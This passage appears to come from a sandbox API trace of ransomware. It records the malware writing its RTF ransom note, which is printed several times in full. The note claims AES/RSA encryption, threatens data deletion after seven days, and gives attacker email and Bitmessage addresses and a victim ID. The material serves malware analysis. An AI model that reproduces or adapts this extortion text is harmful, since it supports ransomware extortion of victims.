m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nA\x1c\x92¨%b²þöO\x90\x98\x15\x1d\x98·\x02Åô\x04É\x9aÆ\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0269.073] WriteFile (in: hFile=0x294, lpBuffer=0x2466938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2466938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.073] CloseHandle (hObject=0x294) returned 1 [0269.073] GetFileAttributesW (lpFileName="C:\\ProgramData\\regid.1991-06.com.microsoft\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\#readme_eman#.rtf")) returned 0xffffffff [0269.073] GetLastError () returned 0x2 [0269.073] CreateFileW (lpFileName="C:\\ProgramData\\regid.1991-06.com.microsoft\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\regid.1991-06.com.microsoft\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0269.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.077] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 